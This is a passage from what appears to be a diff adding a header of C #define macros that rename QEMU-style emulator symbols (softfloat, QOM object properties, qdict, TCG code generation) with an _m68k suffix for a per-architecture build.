normalizeFloat128Subnormal normalizeFloat128Subnormal_m68k +#define normalizeFloat16Subnormal normalizeFloat16Subnormal_m68k +#define normalizeFloat32Subnormal normalizeFloat32Subnormal_m68k +#define normalizeFloat64Subnormal normalizeFloat64Subnormal_m68k +#define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_m68k +#define normalizeRoundAndPackFloat128 normalizeRoundAndPackFloat128_m68k +#define normalizeRoundAndPackFloat32 normalizeRoundAndPackFloat32_m68k +#define normalizeRoundAndPackFloat64 normalizeRoundAndPackFloat64_m68k +#define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_m68k +#define not_v6_cp_reginfo not_v6_cp_reginfo_m68k +#define not_v7_cp_reginfo not_v7_cp_reginfo_m68k +#define not_v8_cp_reginfo not_v8_cp_reginfo_m68k +#define object_child_foreach object_child_foreach_m68k +#define object_class_foreach object_class_foreach_m68k +#define object_class_foreach_tramp object_class_foreach_tramp_m68k +#define object_class_get_list object_class_get_list_m68k +#define object_class_get_list_tramp object_class_get_list_tramp_m68k +#define object_class_get_parent object_class_get_parent_m68k +#define object_deinit object_deinit_m68k +#define object_dynamic_cast object_dynamic_cast_m68k +#define object_finalize object_finalize_m68k +#define object_finalize_child_property object_finalize_child_property_m68k +#define object_get_child_property object_get_child_property_m68k +#define object_get_link_property object_get_link_property_m68k +#define object_get_root object_get_root_m68k +#define object_initialize_with_type object_initialize_with_type_m68k +#define object_init_with_type object_init_with_type_m68k +#define object_instance_init object_instance_init_m68k +#define object_new_with_type object_new_with_type_m68k +#define object_post_init_with_type object_post_init_with_type_m68k +#define object_property_add_alias object_property_add_alias_m68k +#define object_property_add_link object_property_add_link_m68k +#define 
object_property_add_uint16_ptr object_property_add_uint16_ptr_m68k +#define object_property_add_uint32_ptr object_property_add_uint32_ptr_m68k +#define object_property_add_uint64_ptr object_property_add_uint64_ptr_m68k +#define object_property_add_uint8_ptr object_property_add_uint8_ptr_m68k +#define object_property_allow_set_link object_property_allow_set_link_m68k +#define object_property_del object_property_del_m68k +#define object_property_del_all object_property_del_all_m68k +#define object_property_find object_property_find_m68k +#define object_property_get object_property_get_m68k +#define object_property_get_bool object_property_get_bool_m68k +#define object_property_get_int object_property_get_int_m68k +#define object_property_get_link object_property_get_link_m68k +#define object_property_get_qobject object_property_get_qobject_m68k +#define object_property_get_str object_property_get_str_m68k +#define object_property_get_type object_property_get_type_m68k +#define object_property_is_child object_property_is_child_m68k +#define object_property_set object_property_set_m68k +#define object_property_set_description object_property_set_description_m68k +#define object_property_set_link object_property_set_link_m68k +#define object_property_set_qobject object_property_set_qobject_m68k +#define object_release_link_property object_release_link_property_m68k +#define object_resolve_abs_path object_resolve_abs_path_m68k +#define object_resolve_child_property object_resolve_child_property_m68k +#define object_resolve_link object_resolve_link_m68k +#define object_resolve_link_property object_resolve_link_property_m68k +#define object_resolve_partial_path object_resolve_partial_path_m68k +#define object_resolve_path object_resolve_path_m68k +#define object_resolve_path_component object_resolve_path_component_m68k +#define object_resolve_path_type object_resolve_path_type_m68k +#define object_set_link_property object_set_link_property_m68k +#define object_unparent 
object_unparent_m68k +#define omap_cachemaint_write omap_cachemaint_write_m68k +#define omap_cp_reginfo omap_cp_reginfo_m68k +#define omap_threadid_write omap_threadid_write_m68k +#define omap_ticonfig_write omap_ticonfig_write_m68k +#define omap_wfi_write omap_wfi_write_m68k +#define op_bits op_bits_m68k +#define open_modeflags open_modeflags_m68k +#define op_to_mov op_to_mov_m68k +#define op_to_movi op_to_movi_m68k +#define output_type_enum output_type_enum_m68k +#define packFloat128 packFloat128_m68k +#define packFloat16 packFloat16_m68k +#define packFloat32 packFloat32_m68k +#define packFloat64 packFloat64_m68k +#define packFloatx80 packFloatx80_m68k +#define page_find page_find_m68k +#define page_find_alloc page_find_alloc_m68k +#define page_flush_tb page_flush_tb_m68k +#define page_flush_tb_1 page_flush_tb_1_m68k +#define page_init page_init_m68k +#define page_size_init page_size_init_m68k +#define par par_m68k +#define parse_array parse_array_m68k +#define parse_error parse_error_m68k +#define parse_escape parse_escape_m68k +#define parse_keyword parse_keyword_m68k +#define parse_literal parse_literal_m68k +#define parse_object parse_object_m68k +#define parse_optional parse_optional_m68k +#define parse_option_bool parse_option_bool_m68k +#define parse_option_number parse_option_number_m68k +#define parse_option_size parse_option_size_m68k +#define parse_pair parse_pair_m68k +#define parser_context_free parser_context_free_m68k +#define parser_context_new parser_context_new_m68k +#define parser_context_peek_token parser_context_peek_token_m68k +#define parser_context_pop_token parser_context_pop_token_m68k +#define parser_context_restore parser_context_restore_m68k +#define parser_context_save parser_context_save_m68k +#define parse_str parse_str_m68k +#define parse_type_bool parse_type_bool_m68k +#define parse_type_int parse_type_int_m68k +#define parse_type_number parse_type_number_m68k +#define parse_type_size parse_type_size_m68k +#define parse_type_str 
parse_type_str_m68k +#define parse_value parse_value_m68k +#define par_write par_write_m68k +#define patch_reloc patch_reloc_m68k +#define phys_map_node_alloc phys_map_node_alloc_m68k +#define phys_map_node_reserve phys_map_node_reserve_m68k +#define phys_mem_alloc phys_mem_alloc_m68k +#define phys_mem_set_alloc phys_mem_set_alloc_m68k +#define phys_page_compact phys_page_compact_m68k +#define phys_page_compact_all phys_page_compact_all_m68k +#define phys_page_find phys_page_find_m68k +#define phys_page_set phys_page_set_m68k +#define phys_page_set_level phys_page_set_level_m68k +#define phys_section_add phys_section_add_m68k +#define phys_section_destroy phys_section_destroy_m68k +#define phys_sections_free phys_sections_free_m68k +#define pickNaN pickNaN_m68k +#define pickNaNMulAdd pickNaNMulAdd_m68k +#define pmccfiltr_write pmccfiltr_write_m68k +#define pmccntr_read pmccntr_read_m68k +#define pmccntr_sync pmccntr_sync_m68k +#define pmccntr_write pmccntr_write_m68k +#define pmccntr_write32 pmccntr_write32_m68k +#define pmcntenclr_write pmcntenclr_write_m68k +#define pmcntenset_write pmcntenset_write_m68k +#define pmcr_write pmcr_write_m68k +#define pmintenclr_write pmintenclr_write_m68k +#define pmintenset_write pmintenset_write_m68k +#define pmovsr_write pmovsr_write_m68k +#define pmreg_access pmreg_access_m68k +#define pmsav5_cp_reginfo pmsav5_cp_reginfo_m68k +#define pmsav5_data_ap_read pmsav5_data_ap_read_m68k +#define pmsav5_data_ap_write pmsav5_data_ap_write_m68k +#define pmsav5_insn_ap_read pmsav5_insn_ap_read_m68k +#define pmsav5_insn_ap_write pmsav5_insn_ap_write_m68k +#define pmuserenr_write pmuserenr_write_m68k +#define pmxevtyper_write pmxevtyper_write_m68k +#define print_type_bool print_type_bool_m68k +#define print_type_int print_type_int_m68k +#define print_type_number print_type_number_m68k +#define print_type_size print_type_size_m68k +#define print_type_str print_type_str_m68k +#define propagateFloat128NaN propagateFloat128NaN_m68k +#define 
propagateFloat32MulAddNaN propagateFloat32MulAddNaN_m68k +#define propagateFloat32NaN propagateFloat32NaN_m68k +#define propagateFloat64MulAddNaN propagateFloat64MulAddNaN_m68k +#define propagateFloat64NaN propagateFloat64NaN_m68k +#define propagateFloatx80NaN propagateFloatx80NaN_m68k +#define property_get_alias property_get_alias_m68k +#define property_get_bool property_get_bool_m68k +#define property_get_str property_get_str_m68k +#define property_get_uint16_ptr property_get_uint16_ptr_m68k +#define property_get_uint32_ptr property_get_uint32_ptr_m68k +#define property_get_uint64_ptr property_get_uint64_ptr_m68k +#define property_get_uint8_ptr property_get_uint8_ptr_m68k +#define property_release_alias property_release_alias_m68k +#define property_release_bool property_release_bool_m68k +#define property_release_str property_release_str_m68k +#define property_resolve_alias property_resolve_alias_m68k +#define property_set_alias property_set_alias_m68k +#define property_set_bool property_set_bool_m68k +#define property_set_str property_set_str_m68k +#define pstate_read pstate_read_m68k +#define pstate_write pstate_write_m68k +#define pxa250_initfn pxa250_initfn_m68k +#define pxa255_initfn pxa255_initfn_m68k +#define pxa260_initfn pxa260_initfn_m68k +#define pxa261_initfn pxa261_initfn_m68k +#define pxa262_initfn pxa262_initfn_m68k +#define pxa270a0_initfn pxa270a0_initfn_m68k +#define pxa270a1_initfn pxa270a1_initfn_m68k +#define pxa270b0_initfn pxa270b0_initfn_m68k +#define pxa270b1_initfn pxa270b1_initfn_m68k +#define pxa270c0_initfn pxa270c0_initfn_m68k +#define pxa270c5_initfn pxa270c5_initfn_m68k +#define qapi_dealloc_end_implicit_struct qapi_dealloc_end_implicit_struct_m68k +#define qapi_dealloc_end_list qapi_dealloc_end_list_m68k +#define qapi_dealloc_end_struct qapi_dealloc_end_struct_m68k +#define qapi_dealloc_get_visitor qapi_dealloc_get_visitor_m68k +#define qapi_dealloc_next_list qapi_dealloc_next_list_m68k +#define qapi_dealloc_pop 
qapi_dealloc_pop_m68k +#define qapi_dealloc_push qapi_dealloc_push_m68k +#define qapi_dealloc_start_implicit_struct qapi_dealloc_start_implicit_struct_m68k +#define qapi_dealloc_start_list qapi_dealloc_start_list_m68k +#define qapi_dealloc_start_struct qapi_dealloc_start_struct_m68k +#define qapi_dealloc_start_union qapi_dealloc_start_union_m68k +#define qapi_dealloc_type_bool qapi_dealloc_type_bool_m68k +#define qapi_dealloc_type_enum qapi_dealloc_type_enum_m68k +#define qapi_dealloc_type_int qapi_dealloc_type_int_m68k +#define qapi_dealloc_type_number qapi_dealloc_type_number_m68k +#define qapi_dealloc_type_size qapi_dealloc_type_size_m68k +#define qapi_dealloc_type_str qapi_dealloc_type_str_m68k +#define qapi_dealloc_visitor_cleanup qapi_dealloc_visitor_cleanup_m68k +#define qapi_dealloc_visitor_new qapi_dealloc_visitor_new_m68k +#define qapi_free_boolList qapi_free_boolList_m68k +#define qapi_free_ErrorClassList qapi_free_ErrorClassList_m68k +#define qapi_free_int16List qapi_free_int16List_m68k +#define qapi_free_int32List qapi_free_int32List_m68k +#define qapi_free_int64List qapi_free_int64List_m68k +#define qapi_free_int8List qapi_free_int8List_m68k +#define qapi_free_intList qapi_free_intList_m68k +#define qapi_free_numberList qapi_free_numberList_m68k +#define qapi_free_strList qapi_free_strList_m68k +#define qapi_free_uint16List qapi_free_uint16List_m68k +#define qapi_free_uint32List qapi_free_uint32List_m68k +#define qapi_free_uint64List qapi_free_uint64List_m68k +#define qapi_free_uint8List qapi_free_uint8List_m68k +#define qapi_free_X86CPUFeatureWordInfo qapi_free_X86CPUFeatureWordInfo_m68k +#define qapi_free_X86CPUFeatureWordInfoList qapi_free_X86CPUFeatureWordInfoList_m68k +#define qapi_free_X86CPURegister32List qapi_free_X86CPURegister32List_m68k +#define qbool_destroy_obj qbool_destroy_obj_m68k +#define qbool_from_int qbool_from_int_m68k +#define qbool_get_int qbool_get_int_m68k +#define qbool_type qbool_type_m68k +#define qbus_create 
qbus_create_m68k +#define qbus_create_inplace qbus_create_inplace_m68k +#define qbus_finalize qbus_finalize_m68k +#define qbus_initfn qbus_initfn_m68k +#define qbus_realize qbus_realize_m68k +#define qdev_create qdev_create_m68k +#define qdev_get_type qdev_get_type_m68k +#define qdev_register_types qdev_register_types_m68k +#define qdev_set_parent_bus qdev_set_parent_bus_m68k +#define qdev_try_create qdev_try_create_m68k +#define qdict_add_key qdict_add_key_m68k +#define qdict_array_split qdict_array_split_m68k +#define qdict_clone_shallow qdict_clone_shallow_m68k +#define qdict_del qdict_del_m68k +#define qdict_destroy_obj qdict_destroy_obj_m68k +#define qdict_entry_key qdict_entry_key_m68k +#define qdict_entry_value qdict_entry_value_m68k +#define qdict_extract_subqdict qdict_extract_subqdict_m68k +#define qdict_find qdict_find_m68k +#define qdict_first qdict_first_m68k +#define qdict_flatten qdict_flatten_m68k +#define qdict_flatten_qdict qdict_flatten_qdict_m68k +#define qdict_flatten_qlist qdict_flatten_qlist_m68k +#define qdict_get qdict_get_m68k +#define qdict_get_bool qdict_get_bool_m68k +#define qdict_get_double qdict_get_double_m68k +#define qdict_get_int qdict_get_int_m68k +#define qdict_get_obj qdict_get_obj_m68k +#define qdict_get_qdict qdict_get_qdict_m68k +#define qdict_get_qlist qdict_get_qlist_m68k +#define qdict_get_str qdict_get_str_m68k +#define qdict_get_try_bool qdict_get_try_bool_m68k +#define qdict_get_try_int qdict_get_try_int_m68k +#define qdict_get_try_str qdict_get_try_str_m68k +#define qdict_haskey qdict_haskey_m68k +#define qdict_has_prefixed_entries qdict_has_prefixed_entries_m68k +#define qdict_iter qdict_iter_m68k +#define qdict_join qdict_join_m68k +#define qdict_new qdict_new_m68k +#define qdict_next qdict_next_m68k +#define qdict_next_entry qdict_next_entry_m68k +#define qdict_put_obj qdict_put_obj_m68k +#define qdict_size qdict_size_m68k +#define qdict_type qdict_type_m68k +#define qemu_clock_get_us qemu_clock_get_us_m68k 
+#define qemu_clock_ptr qemu_clock_ptr_m68k +#define qemu_clocks qemu_clocks_m68k +#define qemu_get_cpu qemu_get_cpu_m68k +#define qemu_get_guest_memory_mapping qemu_get_guest_memory_mapping_m68k +#define qemu_get_guest_simple_memory_mapping qemu_get_guest_simple_memory_mapping_m68k +#define qemu_get_ram_block qemu_get_ram_block_m68k +#define qemu_get_ram_block_host_ptr qemu_get_ram_block_host_ptr_m68k +#define qemu_get_ram_fd qemu_get_ram_fd_m68k +#define qemu_get_ram_ptr qemu_get_ram_ptr_m68k +#define qemu_host_page_mask qemu_host_page_mask_m68k +#define qemu_host_page_size qemu_host_page_size_m68k +#define qemu_init_vcpu qemu_init_vcpu_m68k +#define qemu_ld_helpers qemu_ld_helpers_m68k +#define qemu_log_close qemu_log_close_m68k +#define qemu_log_enabled qemu_log_enabled_m68k +#define qemu_log_flush qemu_log_flush_m68k +#define qemu_loglevel_mask qemu_loglevel_mask_m68k +#define qemu_log_vprintf qemu_log_vprintf_m68k +#define qemu_oom_check qemu_oom_check_m68k +#define qemu_parse_fd qemu_parse_fd_m68k +#define qemu_ram_addr_from_host qemu_ram_addr_from_host_m68k +#define qemu_ram_addr_from_host_nofail qemu_ram_addr_from_host_nofail_m68k +#define qemu_ram_alloc qemu_ram_alloc_m68k +#define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_m68k +#define qemu_ram_foreach_block qemu_ram_foreach_block_m68k +#define qemu_ram_free qemu_ram_free_m68k +#define qemu_ram_free_from_ptr qemu_ram_free_from_ptr_m68k +#define qemu_ram_ptr_length qemu_ram_ptr_length_m68k +#define qemu_ram_remap qemu_ram_remap_m68k +#define qemu_ram_setup_dump qemu_ram_setup_dump_m68k +#define qemu_ram_unset_idstr qemu_ram_unset_idstr_m68k +#define qemu_real_host_page_size qemu_real_host_page_size_m68k +#define qemu_st_helpers qemu_st_helpers_m68k +#define qemu_tcg_init_vcpu qemu_tcg_init_vcpu_m68k +#define qemu_try_memalign qemu_try_memalign_m68k +#define qentry_destroy qentry_destroy_m68k +#define qerror_human qerror_human_m68k +#define qerror_report qerror_report_m68k +#define qerror_report_err 
qerror_report_err_m68k +#define qfloat_destroy_obj qfloat_destroy_obj_m68k +#define qfloat_from_double qfloat_from_double_m68k +#define qfloat_get_double qfloat_get_double_m68k +#define qfloat_type qfloat_type_m68k +#define qint_destroy_obj qint_destroy_obj_m68k +#define qint_from_int qint_from_int_m68k +#define qint_get_int qint_get_int_m68k +#define qint_type qint_type_m68k +#define qlist_append_obj qlist_append_obj_m68k +#define qlist_copy qlist_copy_m68k +#define qlist_copy_elem qlist_copy_elem_m68k +#define qlist_destroy_obj qlist_destroy_obj_m68k +#define qlist_empty qlist_empty_m68k +#define qlist_entry_obj qlist_entry_obj_m68k +#define qlist_first qlist_first_m68k +#define qlist_iter qlist_iter_m68k +#define qlist_new qlist_new_m68k +#define qlist_next qlist_next_m68k +#define qlist_peek qlist_peek_m68k +#define qlist_pop qlist_pop_m68k +#define qlist_size qlist_size_m68k +#define qlist_size_iter qlist_size_iter_m68k +#define qlist_type qlist_type_m68k +#define qmp_input_end_implicit_struct qmp_input_end_implicit_struct_m68k +#define qmp_input_end_list qmp_input_end_list_m68k +#define qmp_input_end_struct qmp_input_end_struct_m68k +#define qmp_input_get_next_type qmp_input_get_next_type_m68k +#define qmp_input_get_object qmp_input_get_object_m68k +#define qmp_input_get_visitor qmp_input_get_visitor_m68k +#define qmp_input_next_list qmp_input_next_list_m68k +#define qmp_input_optional qmp_input_optional_m68k +#define qmp_input_pop qmp_input_pop_m68k +#define qmp_input_push qmp_input_push_m68k +#define qmp_input_start_implicit_struct qmp_input_start_implicit_struct_m68k +#define qmp_input_start_list qmp_input_start_list_m68k +#define qmp_input_start_struct qmp_input_start_struct_m68k +#define qmp_input_type_bool qmp_input_type_bool_m68k +#define qmp_input_type_int qmp_input_type_int_m68k +#define qmp_input_type_number qmp_input_type_number_m68k +#define qmp_input_type_str qmp_input_type_str_m68k +#define qmp_input_visitor_cleanup 
qmp_input_visitor_cleanup_m68k +#define qmp_input_visitor_new qmp_input_visitor_new_m68k +#define qmp_input_visitor_new_strict qmp_input_visitor_new_strict_m68k +#define qmp_output_add_obj qmp_output_add_obj_m68k +#define qmp_output_end_list qmp_output_end_list_m68k +#define qmp_output_end_struct qmp_output_end_struct_m68k +#define qmp_output_first qmp_output_first_m68k +#define qmp_output_get_qobject qmp_output_get_qobject_m68k +#define qmp_output_get_visitor qmp_output_get_visitor_m68k +#define qmp_output_last qmp_output_last_m68k +#define qmp_output_next_list qmp_output_next_list_m68k +#define qmp_output_pop qmp_output_pop_m68k +#define qmp_output_push_obj qmp_output_push_obj_m68k +#define qmp_output_start_list qmp_output_start_list_m68k +#define qmp_output_start_struct qmp_output_start_struct_m68k +#define qmp_output_type_bool qmp_output_type_bool_m68k +#define qmp_output_type_int qmp_output_type_int_m68k +#define qmp_output_type_number qmp_output_type_number_m68k +#define qmp_output_type_str qmp_output_type_str_m68k +#define qmp_output_visitor_cleanup qmp_output_visitor_cleanup_m68k +#define qmp_output_visitor_new qmp_output_visitor_new_m68k +#define qobject_decref qobject_decref_m68k +#define qobject_to_qbool qobject_to_qbool_m68k +#define qobject_to_qdict qobject_to_qdict_m68k +#define qobject_to_qfloat qobject_to_qfloat_m68k +#define qobject_to_qint qobject_to_qint_m68k +#define qobject_to_qlist qobject_to_qlist_m68k +#define qobject_to_qstring qobject_to_qstring_m68k +#define qobject_type qobject_type_m68k +#define qstring_append qstring_append_m68k +#define qstring_append_chr qstring_append_chr_m68k +#define qstring_append_int qstring_append_int_m68k +#define qstring_destroy_obj qstring_destroy_obj_m68k +#define qstring_from_escaped_str qstring_from_escaped_str_m68k +#define qstring_from_str qstring_from_str_m68k +#define qstring_from_substr qstring_from_substr_m68k +#define qstring_get_length qstring_get_length_m68k +#define qstring_get_str 
qstring_get_str_m68k +#define qstring_new qstring_new_m68k +#define qstring_type qstring_type_m68k +#define ram_block_add ram_block_add_m68k +#define ram_size ram_size_m68k +#define range_compare range_compare_m68k +#define range_covers_byte range_covers_byte_m68k +#define range_get_last range_get_last_m68k +#define range_merge range_merge_m68k +#define ranges_can_merge ranges_can_merge_m68k +#define raw_read raw_read_m68k +#define raw_write raw_write_m68k +#define rcon rcon_m68k +#define read_raw_cp_reg read_raw_cp_reg_m68k +#define recip_estimate recip_estimate_m68k +#define recip_sqrt_estimate recip_sqrt_estimate_m68k +#define register_cp_regs_for_features register_cp_regs_for_features_m68k +#define register_multipage register_multipage_m68k +#define register_subpage register_subpage_m68k +#define register_tm_clones register_tm_clones_m68k +#define register_types_object register_types_object_m68k +#define regnames regnames_m68k +#define render_memory_region render_memory_region_m68k +#define reset_all_temps reset_all_temps_m68k +#define reset_temp reset_temp_m68k +#define rol32 rol32_m68k +#define rol64 rol64_m68k +#define ror32 ror32_m68k +#define ror64 ror64_m68k +#define roundAndPackFloat128 roundAndPackFloat128_m68k +#define roundAndPackFloat16 roundAndPackFloat16_m68k +#define roundAndPackFloat32 roundAndPackFloat32_m68k +#define roundAndPackFloat64 roundAndPackFloat64_m68k +#define roundAndPackFloatx80 roundAndPackFloatx80_m68k +#define roundAndPackInt32 roundAndPackInt32_m68k +#define roundAndPackInt64 roundAndPackInt64_m68k +#define roundAndPackUint64 roundAndPackUint64_m68k +#define round_to_inf round_to_inf_m68k +#define run_on_cpu run_on_cpu_m68k +#define s0 s0_m68k +#define S0 S0_m68k +#define s1 s1_m68k +#define S1 S1_m68k +#define sa1100_initfn sa1100_initfn_m68k +#define sa1110_initfn sa1110_initfn_m68k +#define save_globals save_globals_m68k +#define scr_write scr_write_m68k +#define sctlr_write sctlr_write_m68k +#define set_bit set_bit_m68k 
+#define set_bits set_bits_m68k +#define set_default_nan_mode set_default_nan_mode_m68k +#define set_feature set_feature_m68k +#define set_float_detect_tininess set_float_detect_tininess_m68k +#define set_float_exception_flags set_float_exception_flags_m68k +#define set_float_rounding_mode set_float_rounding_mode_m68k +#define set_flush_inputs_to_zero set_flush_inputs_to_zero_m68k +#define set_flush_to_zero set_flush_to_zero_m68k +#define set_swi_errno set_swi_errno_m68k +#define sextract32 sextract32_m68k +#define sextract64 sextract64_m68k +#define shift128ExtraRightJamming shift128ExtraRightJamming_m68k +#define shift128Right shift128Right_m68k +#define shift128RightJamming shift128RightJamming_m68k +#define shift32RightJamming shift32RightJamming_m68k +#define shift64ExtraRightJamming shift64ExtraRightJamming_m68k +#define shift64RightJamming shift64RightJamming_m68k +#define shifter_out_im shifter_out_im_m68k +#define shortShift128Left shortShift128Left_m68k +#define shortShift192Left shortShift192Left_m68k +#define simple_mpu_ap_bits simple_mpu_ap_bits_m68k +#define size_code_gen_buffer size_code_gen_buffer_m68k +#define softmmu_lock_user softmmu_lock_user_m68k +#define softmmu_lock_user_string softmmu_lock_user_string_m68k +#define softmmu_tget32 softmmu_tget32_m68k +#define softmmu_tget8 softmmu_tget8_m68k +#define softmmu_tput32 softmmu_tput32_m68k +#define softmmu_unlock_user softmmu_unlock_user_m68k +#define sort_constraints sort_constraints_m68k +#define sp_el0_access sp_el0_access_m68k +#define spsel_read spsel_read_m68k +#define spsel_write spsel_write_m68k +#define start_list start_list_m68k +#define stb_p stb_p_m68k +#define stb_phys stb_phys_m68k +#define stl_be_p stl_be_p_m68k +#define stl_be_phys stl_be_phys_m68k +#define stl_he_p stl_he_p_m68k +#define stl_le_p stl_le_p_m68k +#define stl_le_phys stl_le_phys_m68k +#define stl_phys stl_phys_m68k +#define stl_phys_internal stl_phys_internal_m68k +#define stl_phys_notdirty stl_phys_notdirty_m68k 
+#define store_cpu_offset store_cpu_offset_m68k +#define store_reg store_reg_m68k +#define store_reg_bx store_reg_bx_m68k +#define store_reg_from_load store_reg_from_load_m68k +#define stq_be_p stq_be_p_m68k +#define stq_be_phys stq_be_phys_m68k +#define stq_he_p stq_he_p_m68k +#define stq_le_p stq_le_p_m68k +#define stq_le_phys stq_le_phys_m68k +#define stq_phys stq_phys_m68k +#define string_input_get_visitor string_input_get_visitor_m68k +#define string_input_visitor_cleanup string_input_visitor_cleanup_m68k +#define string_input_visitor_new string_input_visitor_new_m68k +#define strongarm_cp_reginfo strongarm_cp_reginfo_m68k +#define strstart strstart_m68k +#define strtosz strtosz_m68k +#define strtosz_suffix strtosz_suffix_m68k +#define stw_be_p stw_be_p_m68k +#define stw_be_phys stw_be_phys_m68k +#define stw_he_p stw_he_p_m68k +#define stw_le_p stw_le_p_m68k +#define stw_le_phys stw_le_phys_m68k +#define stw_phys stw_phys_m68k +#define stw_phys_internal stw_phys_internal_m68k +#define sub128 sub128_m68k +#define sub16_sat sub16_sat_m68k +#define sub16_usat sub16_usat_m68k +#define sub192 sub192_m68k +#define sub8_sat sub8_sat_m68k +#define sub8_usat sub8_usat_m68k +#define subFloat128Sigs subFloat128Sigs_m68k +#define subFloat32Sigs subFloat32Sigs_m68k +#define subFloat64Sigs subFloat64Sigs_m68k +#define subFloatx80Sigs subFloatx80Sigs_m68k +#define subpage_accepts subpage_accepts_m68k +#define subpage_init subpage_init_m68k +#define subpage_ops subpage_ops_m68k +#define subpage_read subpage_read_m68k +#define subpage_register subpage_register_m68k +#define subpage_write subpage_write_m68k +#define suffix_mul suffix_mul_m68k +#define swap_commutative swap_commutative_m68k +#define swap_commutative2 swap_commutative2_m68k +#define switch_mode switch_mode_m68k +#define switch_v7m_sp switch_v7m_sp_m68k +#define syn_aa32_bkpt syn_aa32_bkpt_m68k +#define syn_aa32_hvc syn_aa32_hvc_m68k +#define syn_aa32_smc syn_aa32_smc_m68k +#define syn_aa32_svc syn_aa32_svc_m68k 
+#define syn_breakpoint syn_breakpoint_m68k +#define sync_globals sync_globals_m68k +#define syn_cp14_rrt_trap syn_cp14_rrt_trap_m68k +#define syn_cp14_rt_trap syn_cp14_rt_trap_m68k +#define syn_cp15_rrt_trap syn_cp15_rrt_trap_m68k +#define syn_cp15_rt_trap syn_cp15_rt_trap_m68k +#define syn_data_abort syn_data_abort_m68k +#define syn_fp_access_trap syn_fp_access_trap_m68k +#define syn_insn_abort syn_insn_abort_m68k +#define syn_swstep syn_swstep_m68k +#define syn_uncategorized syn_uncategorized_m68k +#define syn_watchpoint syn_watchpoint_m68k +#define syscall_err syscall_err_m68k +#define system_bus_class_init system_bus_class_init_m68k +#define system_bus_info system_bus_info_m68k +#define t2ee_cp_reginfo t2ee_cp_reginfo_m68k +#define table_logic_cc table_logic_cc_m68k +#define target_parse_constraint target_parse_constraint_m68k +#define target_words_bigendian target_words_bigendian_m68k +#define tb_add_jump tb_add_jump_m68k +#define tb_alloc tb_alloc_m68k +#define tb_alloc_page tb_alloc_page_m68k +#define tb_check_watchpoint tb_check_watchpoint_m68k +#define tb_find_fast tb_find_fast_m68k +#define tb_find_pc tb_find_pc_m68k +#define tb_find_slow tb_find_slow_m68k +#define tb_flush tb_flush_m68k +#define tb_flush_jmp_cache tb_flush_jmp_cache_m68k +#define tb_free tb_free_m68k +#define tb_gen_code tb_gen_code_m68k +#define tb_hash_remove tb_hash_remove_m68k +#define tb_invalidate_phys_addr tb_invalidate_phys_addr_m68k +#define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_m68k +#define tb_invalidate_phys_range tb_invalidate_phys_range_m68k +#define tb_jmp_cache_hash_func tb_jmp_cache_hash_func_m68k +#define tb_jmp_cache_hash_page tb_jmp_cache_hash_page_m68k +#define tb_jmp_remove tb_jmp_remove_m68k +#define tb_link_page tb_link_page_m68k +#define tb_page_remove tb_page_remove_m68k +#define tb_phys_hash_func tb_phys_hash_func_m68k +#define tb_phys_invalidate tb_phys_invalidate_m68k +#define tb_reset_jump tb_reset_jump_m68k +#define tb_set_jmp_target 
tb_set_jmp_target_m68k +#define tcg_accel_class_init tcg_accel_class_init_m68k +#define tcg_accel_type tcg_accel_type_m68k +#define tcg_add_param_i32 tcg_add_param_i32_m68k +#define tcg_add_param_i64 tcg_add_param_i64_m68k +#define tcg_add_target_add_op_defs tcg_add_target_add_op_defs_m68k +#define tcg_allowed tcg_allowed_m68k +#define tcg_canonicalize_memop tcg_canonicalize_memop_m68k +#define tcg_commit tcg_commit_m68k +#define tcg_cond_to_jcc tcg_cond_to_jcc_m68k +#define tcg_constant_folding tcg_constant_folding_m68k +#define tcg_const_i32 tcg_const_i32_m68k +#define tcg_const_i64 tcg_const_i64_m68k +#define tcg_const_local_i32 tcg_const_local_i32_m68k +#define tcg_const_local_i64 tcg_const_local_i64_m68k +#define tcg_context_init tcg_context_init_m68k +#define tcg_cpu_address_space_init tcg_cpu_address_space_init_m68k +#define tcg_cpu_exec tcg_cpu_exec_m68k +#define tcg_current_code_size tcg_current_code_size_m68k +#define tcg_dump_info tcg_dump_info_m68k +#define tcg_dump_ops tcg_dump_ops_m68k +#define tcg_exec_all tcg_exec_all_m68k +#define tcg_find_helper tcg_find_helper_m68k +#define tcg_func_start tcg_func_start_m68k +#define tcg_gen_abs_i32 tcg_gen_abs_i32_m68k +#define tcg_gen_add2_i32 tcg_gen_add2_i32_m68k +#define tcg_gen_add_i32 tcg_gen_add_i32_m68k +#define tcg_gen_add_i64 tcg_gen_add_i64_m68k +#define tcg_gen_addi_i32 tcg_gen_addi_i32_m68k +#define tcg_gen_addi_i64 tcg_gen_addi_i64_m68k +#define tcg_gen_andc_i32 tcg_gen_andc_i32_m68k +#define tcg_gen_and_i32 tcg_gen_and_i32_m68k +#define tcg_gen_and_i64 tcg_gen_and_i64_m68k +#define tcg_gen_andi_i32 tcg_gen_andi_i32_m68k +#define tcg_gen_andi_i64 tcg_gen_andi_i64_m68k +#define tcg_gen_br tcg_gen_br_m68k +#define tcg_gen_brcond_i32 tcg_gen_brcond_i32_m68k +#define tcg_gen_brcond_i64 tcg_gen_brcond_i64_m68k +#define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_m68k +#define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_m68k +#define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_m68k +#define tcg_gen_callN 
